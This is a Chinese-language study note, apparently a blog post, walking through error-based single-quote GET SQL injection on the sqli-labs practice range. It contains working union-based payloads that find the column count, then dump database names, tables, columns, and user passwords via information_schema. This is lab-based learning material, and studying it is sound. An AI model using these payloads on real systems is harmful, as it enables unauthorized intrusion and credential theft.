渗透学习笔记(三)--SQL注入学习(一)
使用靶场为
sqli
靶场
例题为GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
sql注入常见攻击思路
1:寻找到SQL注入的位置
2:判断服务器类型和后台数据库类型
3:针对不同的服务器和数据库特点进行SQL注入攻击
常见流程
- 首先判断sql语句闭合方式
常见的闭合方式:
id = 'input_id'
id = ('input_id')
id = "input_id"
id = ("input_id")
判断方法:
使用'
或者"
来进行判断,如果输入?id=1'
报错,那就是单引号闭合,"
类似。
如上图,'
报错。
- 判断回显列数
使用order by
子句判断返回的列数。
?id=1' order by 5 %23
%23
是#
的url编码,用来注释掉另一个'
order by 5
发现报错
继续尝试
发现order by 3
正常
- 判断返回格式:
id=-1' union select 1,2,3 %23
发现2和3被回显。
知道返回的列名之后,就可以执行后继的操作和查询各种数据了。
例如user()查询用户名,detabase()查询当前的数据库名,version()查询数据库版本
id=-1' union select 1,database(),version() %23
- 查询出当前数据库所有的表名
id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) %23
其中group_concat()
是用来把数据在一行中打印出来。
information_schema
是mysql特有的库,存储各种数据库的信息
- 注入出某一个表中的全部列名
id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='user') %23
- 获得字段内容
id=-1' union select 1,2,(select group_concat(Password) from users) %23
id=-1' union select 1,2,(select group_concat(username) from users) %23
本文来自作者:CK_0ff,转载请注明原文链接:https://www.cnblogs.com/Ck-0ff/p/15815533.html